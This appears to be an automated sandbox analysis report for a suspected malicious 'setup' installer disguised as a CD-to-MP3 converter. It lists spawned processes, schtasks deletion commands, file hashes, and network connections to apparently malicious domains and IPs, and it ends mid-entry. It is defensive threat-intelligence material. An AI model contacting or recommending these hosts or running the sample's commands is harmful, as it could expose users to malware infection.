"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,12261988785608004724,6702640044397299464,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4312 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,12261988785608004724,6702640044397299464,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4572 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,12261988785608004724,6702640044397299464,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5364 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,12261988785608004724,6702640044397299464,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5308 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,12261988785608004724,6702640044397299464,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4504 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2036,12261988785608004724,6702640044397299464,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6004 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2036,12261988785608004724,6702640044397299464,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6004 /prefetch:8

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "YAAFs1"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,12261988785608004724,6702640044397299464,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6216 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,12261988785608004724,6702640044397299464,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6248 /prefetch:1

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "FPIEUdZLMYPzsiUNM"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4956 -ip 4956

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4956 -s 1240

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 2728 -ip 2728

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2728 -s 2212

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,12261988785608004724,6702640044397299464,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3172 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,12261988785608004724,6702640044397299464,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6488 /prefetch:1

Network

Country Destination Domain Proto
US 8.8.8.8:53 ify.ac udp
US 104.21.23.148:443 ify.ac tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 oasqi.nxt-psh.com udp
US 8.8.8.8:53 148.23.21.104.in-addr.arpa udp
US 172.67.194.119:443 oasqi.nxt-psh.com tcp
US 8.8.8.8:53 mc.yandex.ru udp
RU 87.250.250.119:443 mc.yandex.ru tcp
US 8.8.8.8:53 nxt-psh.com udp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 119.194.67.172.in-addr.arpa udp
US 8.8.8.8:53 119.250.250.87.in-addr.arpa udp
US 8.8.8.8:53 74.204.58.216.in-addr.arpa udp
US 8.8.8.8:53 mc.yandex.com udp
US 8.8.8.8:53 99.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 client.wns.windows.com udp
GB 20.90.153.243:443 client.wns.windows.com tcp
US 8.8.8.8:53 fcmregistrations.googleapis.com udp
US 8.8.8.8:53 243.153.90.20.in-addr.arpa udp
US 104.21.20.211:443 nxt-psh.com tcp
US 8.8.8.8:53 static.imghst-de.com udp
US 8.8.8.8:53 jpgtrk.imghst-de.com udp
US 104.26.3.30:443 jpgtrk.imghst-de.com tcp
US 104.26.3.30:443 jpgtrk.imghst-de.com tcp
US 104.26.3.30:443 jpgtrk.imghst-de.com tcp
US 8.8.8.8:53 trk.imghst-de.com udp
US 8.8.8.8:53 30.3.26.104.in-addr.arpa udp
US 8.8.8.8:53 211.20.21.104.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 147.142.123.92.in-addr.arpa udp
US 8.8.8.8:53 soneremonasez.shop udp
US 172.67.180.145:443 soneremonasez.shop tcp
US 172.67.180.145:443 soneremonasez.shop tcp
US 8.8.8.8:53 apps.identrust.com udp
GB 92.123.143.169:80 apps.identrust.com tcp
US 8.8.8.8:53 145.180.67.172.in-addr.arpa udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 cdnjs.cloudflare.com udp
GB 142.250.200.46:443 google.com tcp
US 104.17.25.14:443 cdnjs.cloudflare.com tcp
US 104.17.25.14:443 cdnjs.cloudflare.com tcp
US 8.8.8.8:53 www.google.com udp
GB 142.250.180.4:443 www.google.com tcp
US 8.8.8.8:53 169.143.123.92.in-addr.arpa udp
US 8.8.8.8:53 46.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 14.25.17.104.in-addr.arpa udp
GB 142.250.180.4:443 www.google.com udp
US 8.8.8.8:53 4.180.250.142.in-addr.arpa udp
GB 142.250.180.4:443 www.google.com udp
GB 142.250.200.46:443 google.com udp
US 8.8.8.8:53 a.nel.cloudflare.com udp
US 35.190.80.1:443 a.nel.cloudflare.com tcp
US 35.190.80.1:443 a.nel.cloudflare.com udp
US 8.8.8.8:53 1.80.190.35.in-addr.arpa udp
US 8.8.8.8:53 senzamenuzaes.shop udp
US 172.67.138.9:443 senzamenuzaes.shop tcp
US 8.8.8.8:53 9.138.67.172.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 35.190.80.1:443 a.nel.cloudflare.com udp
US 8.8.8.8:53 soneservice.shop udp
US 104.21.74.224:80 soneservice.shop tcp
US 8.8.8.8:53 224.74.21.104.in-addr.arpa udp
US 104.21.74.224:80 soneservice.shop tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 5.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 99.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 telegram.org udp
US 8.8.8.8:53 cdn5.cdn-telegram.org udp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
US 34.111.108.175:443 cdn5.cdn-telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
US 34.111.108.175:443 cdn5.cdn-telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
US 8.8.8.8:53 175.108.111.34.in-addr.arpa udp
US 104.21.74.224:80 soneservice.shop tcp
US 104.21.74.224:80 soneservice.shop tcp
US 104.21.74.224:80 soneservice.shop tcp
US 8.8.8.8:53 z3n.mom udp
US 104.21.73.21:443 z3n.mom tcp
US 8.8.8.8:53 net.geo.opera.com udp
NL 185.26.182.112:443 net.geo.opera.com tcp
RU 95.163.241.63:80 95.163.241.63 tcp
US 104.21.74.224:80 soneservice.shop tcp
US 8.8.8.8:53 21.73.21.104.in-addr.arpa udp
US 8.8.8.8:53 slatevision.org udp
US 104.21.74.224:80 soneservice.shop tcp
US 198.54.117.242:443 slatevision.org tcp
US 8.8.8.8:53 112.182.26.185.in-addr.arpa udp
US 8.8.8.8:53 63.241.163.95.in-addr.arpa udp
US 8.8.8.8:53 242.117.54.198.in-addr.arpa udp
US 104.21.74.224:80 soneservice.shop tcp
US 104.21.74.224:80 soneservice.shop tcp
US 198.54.117.242:443 slatevision.org tcp
US 104.21.74.224:80 soneservice.shop tcp
US 104.21.74.224:80 soneservice.shop tcp
US 198.54.117.242:443 slatevision.org tcp
US 104.21.74.224:80 soneservice.shop tcp
US 198.54.117.242:443 slatevision.org tcp
US 104.21.74.224:80 soneservice.shop tcp
US 104.21.74.224:80 soneservice.shop tcp
US 8.8.8.8:53 desktop-netinstaller-sub.osp.opera.software udp
US 8.8.8.8:53 autoupdate.geo.opera.com udp
NL 185.26.182.124:443 autoupdate.geo.opera.com tcp
NL 185.26.182.124:443 autoupdate.geo.opera.com tcp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 124.182.26.185.in-addr.arpa udp
US 8.8.8.8:53 121.217.145.82.in-addr.arpa udp
US 8.8.8.8:53 features.opera-api2.com udp
US 8.8.8.8:53 download.opera.com udp
NL 82.145.216.24:443 download.opera.com tcp
NL 185.26.182.93:443 features.opera-api2.com tcp
US 8.8.8.8:53 download5.operacdn.com udp
US 104.18.10.89:443 download5.operacdn.com tcp
US 8.8.8.8:53 24.216.145.82.in-addr.arpa udp
US 8.8.8.8:53 93.182.26.185.in-addr.arpa udp
US 8.8.8.8:53 89.10.18.104.in-addr.arpa udp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 service-domain.xyz udp
US 54.210.117.250:443 service-domain.xyz tcp
US 8.8.8.8:53 168.245.100.95.in-addr.arpa udp
US 8.8.8.8:53 250.117.210.54.in-addr.arpa udp
US 8.8.8.8:53 89.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 10.213.58.216.in-addr.arpa udp
US 8.8.8.8:53 c.pki.goog udp
GB 216.58.201.99:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 216.58.201.99:80 o.pki.goog tcp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.200.14:443 clients2.google.com tcp
US 8.8.8.8:53 clients2.googleusercontent.com udp
GB 142.250.187.225:443 clients2.googleusercontent.com tcp
US 8.8.8.8:53 14.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 225.187.250.142.in-addr.arpa udp
GB 142.250.200.14:443 clients2.google.com tcp
US 8.8.8.8:53 soneservice.shop udp
US 172.67.164.12:80 soneservice.shop tcp
US 8.8.8.8:53 12.164.67.172.in-addr.arpa udp
US 8.8.8.8:53 api5.check-data.xyz udp
US 44.240.96.128:80 api5.check-data.xyz tcp
US 8.8.8.8:53 128.96.240.44.in-addr.arpa udp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 ify.ac udp
US 172.67.211.171:443 ify.ac tcp
US 8.8.8.8:53 api2.check-data.xyz udp
US 8.8.8.8:53 www.rapidfilestorage.com udp
US 44.237.52.63:443 api2.check-data.xyz tcp
US 8.8.8.8:53 234.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 171.211.67.172.in-addr.arpa udp
KZ 185.22.66.16:80 www.rapidfilestorage.com tcp
KZ 185.22.66.16:80 www.rapidfilestorage.com tcp
US 8.8.8.8:53 rfiles5.tracemonitors.com udp
RU 80.78.240.92:80 rfiles5.tracemonitors.com tcp
US 8.8.8.8:53 oasqi.nxt-psh.com udp
RU 80.78.240.92:443 rfiles5.tracemonitors.com tcp
US 172.67.194.119:443 oasqi.nxt-psh.com tcp
US 8.8.8.8:53 mc.yandex.com udp
RU 87.250.250.119:443 mc.yandex.com tcp
US 8.8.8.8:53 rfiles3.tracemonitors.com udp
US 8.8.8.8:53 16.66.22.185.in-addr.arpa udp
US 8.8.8.8:53 63.52.237.44.in-addr.arpa udp
US 8.8.8.8:53 43.39.156.108.in-addr.arpa udp
US 8.8.8.8:53 92.240.78.80.in-addr.arpa udp
US 8.8.8.8:53 nxt-psh.com udp
RU 80.78.240.92:443 rfiles3.tracemonitors.com tcp
US 8.8.8.8:53 soneremonasez.shop udp
US 8.8.8.8:53 clients56.google.com udp
US 172.67.180.145:443 soneremonasez.shop tcp
US 8.8.8.8:53 update.googleapis.com udp
US 8.8.8.8:53 a.nel.cloudflare.com udp
US 35.190.80.1:443 a.nel.cloudflare.com udp
US 35.190.80.1:443 a.nel.cloudflare.com tcp
US 8.8.8.8:53 client.wns.windows.com udp
GB 20.90.152.133:443 client.wns.windows.com tcp
US 8.8.8.8:53 133.152.90.20.in-addr.arpa udp
US 172.67.180.145:443 soneremonasez.shop udp
US 8.8.8.8:53 api5.tracemonitors.com udp
US 44.240.96.128:443 api5.tracemonitors.com tcp
US 44.240.96.128:443 api5.tracemonitors.com tcp
US 8.8.8.8:53 clients56.google.com udp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 7f37f119665df6beaa925337bbff0e84
SHA1 c2601d11f8aa77e12ab3508479cbf20c27cbd865
SHA256 1073dbff3ec315ac85361c35c8ba791cc4198149b097c7b287dda1d791925027
SHA512 8e180e41dd27c51e81788564b19b8ff411028890da506fbf767d394b1e73ec53e046c8d07235b2ec7c1c593c976bbf74ed9b7d442d68b526a0a77a9b5b0ab817

\??\pipe\LOCAL\crashpad_2260_HGJSMEMALQDOLAFA

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 d406f3135e11b0a0829109c1090a41dc
SHA1 810f00e803c17274f9af074fc6c47849ad6e873e
SHA256 91f57909a10174b06c862089a9c1f3b3aeafea74a70ee1942ce11bb80d9eace4
SHA512 2b9f0f94b1e8a1b62ab38af8df2add0ec9e4c6dfa94d9c84cc24fe86d2d57d4fc0d9ec8a9775cf42a859ddfd130260128185a0e2588992bca8fd4ebf5ee6d409

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 a28cc357d31fe4427f8b5e657c0c2b6b
SHA1 c3a89b787bbc94396cdd41ca770a8109d7787a67
SHA256 ac0dd8d68bf4d1b9664b49ab5758f8feff5a5a38ae9f322ae1fbb4e9a5762719
SHA512 988b0cd927103827b625ef360618e180ef2c0ef722a94453704c88d2240fab1d5f1ba0e8fda516ab7c7ee68d5ba5515500024a0a32baa383a1dd9d67bbb06ecc

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\File System\000\t\Paths\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 632ffab6fc24500ba66ae7d838995d7d
SHA1 08c4c3f6fa7d9e50938a3098161dfd1bd5c709d1
SHA256 d26d226befd3b67eafb9e93f01a2cddc0816dce4139c5040b072ce02ef424313
SHA512 8e4008393acfb69f20b4d57da8c3f83eda6f24bfc93cf22c3ac99c4146334a9d1ffea48e658513568aa8bbacf5e1d455f81c188ef50dcaea1cbc0dd47eec5039

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 7b0f69cb04cf0a72de7cdc460e6a9ec2
SHA1 517b7d10fcc26c4614881ce0bff89a7a6c2e7101
SHA256 66cbcc3a95ec3413e747a39d617036cf134771d6604543a1ca413b727b102516
SHA512 5c5bfff34163418dc65416d7dca215eb2c5056e251accc459f9d747b4dd30cdb0e081b1c1a53c1c081617b58c00494d221237446cc3785c422f84eaa0a3499c6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 acc59af3879f29d5dfdbfec518be365c
SHA1 1517d336b5d9b61f3b382a14de675c6cc3be625f
SHA256 8469779699befd67c8980c873dd216125e5cea0cc6f8c0e8dd576767b8f6e052
SHA512 15cf5d586d33c6e357412b6652aee441d6ecf9044adf3a457ff3dbde410863074f089ae02f7305e138ab5afa859ad3a41b8fcd0d9048cb5c481b58de56177f71

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

MD5 62a3f307d69a43068703f94cb93b68ba
SHA1 3c4d3a30af21d460f58a3c511d3b5466476aac25
SHA256 b5c7479ebd3cd928bdfe7e31f01b83131e0f9cc562e8804db66456d73c6486ec
SHA512 91a908275d88cd7234fbd4eb2f00a03f9411c542ce4db8208108c74de526b08d587bcd5801510c86b75aad9100bcc9a70bed4a206a1aed89ad9e5961448b710d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe580829.TMP

MD5 0b60e6c32474e289f07815ae140041d1
SHA1 440a6c8c93ee4910d02994701622b5c6f554ede0
SHA256 b0bee059f6470a33bb92559c8a1d29f31292b786fce842d1c327a94bc65cad67
SHA512 9b9a5b04bebcf5952f44cdc5eeb5e771062185f0819c1cb1ceb717f2939769fdc80e26e51ccd833b825fe8a8c11c3575061494c497ef4fac4fc3e0a316491ee8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 18c31ef5f4e88b255c73ba75706b3d9f
SHA1 c0f426c292d8f97bef0066129c95396d7fc088a1
SHA256 97b4cbe71fae7a9c0ffeb948ab7794b46b49f3c2c55f99547a008ae6a7b9bf10
SHA512 af5089f9893c99accf419e1116842c3b60626f7ade299fb8ffe5bddd6242fe46777a342701d2c6b0df77c1c0018a5e50999f9b8a079b90917c27ce357ef3f361

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\ea4374ca-f618-4bdc-b10a-fbcda94d8560.tmp

MD5 c33f8f528edf15fcce1a3a36cd00a1ad
SHA1 6bd99a65d9120bdf61e7f47fc34b76210fa2dc9a
SHA256 273e47a6e6ef24412988916144d9adb1ce1b07ee3a526b79c9b83c53f2b774d0
SHA512 da2c376f228988b4ba1c30b495e086f573e0552d248e18d8ac63ae3869d923c9ccb13e516e2abb6d31c0ce51b7a0c4f1b0e2bb65852f4d09ab450392ce8ac55a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000008

MD5 151fb811968eaf8efb840908b89dc9d4
SHA1 7ec811009fd9b0e6d92d12d78b002275f2f1bee1
SHA256 043fd8558e4a5a60aaccd2f0377f77a544e3e375242e9d7200dc6e51f94103ed
SHA512 83aface0ab01da52fd077f747c9d5916e3c06b0ea5c551d7d316707ec3e8f3f986ce1c82e6f2136e48c6511a83cb0ac67ff6dc8f0e440ac72fc6854086a87674

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 992f342d6fd28d8dca896c74f6b80c9a
SHA1 8b11f545408b0e5f7960ff8b9f0fd09eb93f29e9
SHA256 87d016c2c6c2ee494038274cc691a320b29c20c00e6c595ca2e7cecaa94debaa
SHA512 af1489736c8e9136289487b73c224e2a9ae8031106a878413733c18df49f50be286f1f6ec4adba4b6e75ec94f3ab0b7c7fff8aaf85ff55b634b3e04b148e383e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe58490a.TMP

MD5 a696e52ad24096073d22eda39947a191
SHA1 c884dda87e3d06a74bc71ca7e446aa968c747279
SHA256 5060410512319572887644060a11767ac4153b63824e77d11c0dcf6926fe1806
SHA512 a6e5384cb1929abe48a079fefca36ae6035f2985e59861c4f543967c89378cd36c02192933da0c0e8d96309e814934c517e2f4e6abda0c5afd275981a3f25ba6

C:\Users\Admin\Downloads\setup_IsfbvpBm5t.zip

MD5 848849721c8d5dcd4f92105505685c18
SHA1 a01cd19c06ed04523168c30a94ac3f19809dbdb0
SHA256 4c3e74c6871a9eb47f71e44da6ba5bcedb47bc6a73f135df5a2adeabae9c5b60
SHA512 341e1b033ed3e1afea718aae0d69df0f0c6df463203b455a50c338a21b99f3d8be7960b9e640dab535b46386fd8abae2f1412a30a59ad2dd02a4c2bf9a54f5eb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 f875f71bd4c4a2e56b86f5e56d5772b1
SHA1 ab2f979c70291681f47193b7810c94312cae2c31
SHA256 9e034e5b317f525b0967820f823a544d8d421fb0c459c361d07e7be345ed07ee
SHA512 8825bcee8501952604ec95fdd54370c4f94650d271ef24cc7a06ba7da0d27bb18e08b659477be63a2fc88832990af520e22f8d61c3e85eddcf456ccb8a785b28

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 f247d788d2bfee7545d36506ad79b658
SHA1 d5e3138a73537228e494a087d3a585cf667110a6
SHA256 7eae97925f555a97f6e2fa3012276ab62209cc874eb2677afe2274c401957fa1
SHA512 4d5d1d44b047e8ee2778912abd842a829fa83e178459e347c986f26d32f2c4f64c9afc14ce990215d4dbf0ae6f0bfa025c7a47a2ffcd7cb7cf610442f5490805

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 415553097291300f3780b930d39d8c7b
SHA1 8c75bde2c14c0aba26a6ea27aed4b4ee004964cf
SHA256 d0bea29917200fa10facbfba3e9fb2380b18ce90a32b4fa153e72084a9da4a68
SHA512 11d160e120ec07c32e5896a499ffda9c39838762b0420ffa62b61de1bb02c03c2d3727c7d2b0771d203be836614f0c27f366340b77bc3b55812ae85dfb5f80ee

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 d2290f1065290fda7052e4c0295c91ad
SHA1 7879109e347c4d13695fbf3dc7f5d821293c0323
SHA256 ec929f34b3a5ae1d26ce84f1959280ff8bd2ed1a734ad19595be6a52506e4c50
SHA512 8fe0693a5ed2ae911253ee9163e40bd617458f5e8ad21de3fccfe7749da2810cbd77c7371cdc316afac56bbeaa14078ecb954877b637c4018535f9050cc28540

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 19b5387acf83bc060191898e841bbc65
SHA1 d629124d7d9fca7466f1e86e2370ed9e6d9887d6
SHA256 b670fa7de9cb6252eecf0ad5550912bd5710f4089cfe92c2fe198f78228edd01
SHA512 2d9a0685016553f1d21a175d2a73c9d55520f40f18287ef2ba292fd5ab770ab43bfc54fb00b00f137a5ec568247e1f8735bb425f7295a489858733142b462796

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 3ad8704b108d929b1540fa777c35c92c
SHA1 09ec2bb1dbf15266f8736b39e8a6fcade473e3f4
SHA256 11d00dd30d6df0fdb014d9645700863c552eb571ee8911dfb0164a2aa90871dc
SHA512 9d067323ae768fec7af33f8ec7e7430c6496155a133c17a64ad97b47fc8a810dcd3cc2e726164a36f164f87015dbdfee01a86a208b626fb9a9f7845dcdf644ad

memory/2916-311-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-ASR24.tmp\setup_IsfbvpBm5t.tmp

MD5 4b0524fa48ddc6b8d8191ef7a213b2e6
SHA1 d05ecb09aadbde153ad37c67db8b0206efa1fd37
SHA256 43af110947449a12b150169d107ff3d7cd103801e5dadf6485cdc719e185bde6
SHA512 4d29764c488281586dbcdb5eeb10a8924ab689ddc839b08b779c98e26eec8460aac531b156eafb937192bce486bee89bc117e47aa1ae4d7045ff72ff813d78bf

C:\Users\Admin\AppData\Local\Temp\is-MS3L5.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe

MD5 7f2c34b6c0c8680f35a234077c40ee51
SHA1 e83cd07646f25afccda2ff63f7035d147268b264
SHA256 a8d33c8ae6df133bebbaebc079225aa6662cad3413a36feefe29c1ac6e3ce474
SHA512 8633680cd10b6ba33831c3962dceecef234b16b328c6f32dd1146a89b42738bdb02e91c1ebe2799e1a4f578050ee1d32b36cbcc92c0b26f0a28d59613a60014f

memory/964-380-0x0000000000400000-0x0000000000D15000-memory.dmp

memory/964-381-0x0000000000400000-0x0000000000D15000-memory.dmp

memory/2276-400-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/2916-399-0x0000000000400000-0x0000000000414000-memory.dmp

memory/964-401-0x0000000000400000-0x0000000000D15000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 6ddc39c199067592212fca3d2a673790
SHA1 a4c4b3e9a3b16195a58f8053a3e708fc39b4bc3c
SHA256 ff963432b90f591c091da8199d337a50b5c532e3929de76ca26677de921f115b
SHA512 282fd2d315499b114e77006b7163a5d6a8a901a29545f21553817de2f373148a6335e712a4172af9b07f35d9d6acf5f2fd82d90db4e8de29ed8ddf8de2602b59

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 4c0574e5c5eb5b7c3e215ae43fb2b7ec
SHA1 6a067dac2a2d9602d5a6d239aab004adb2513960
SHA256 a412ce19277aa584372dda132844a0de5ced2425dd1a081a974a5cc71ea57592
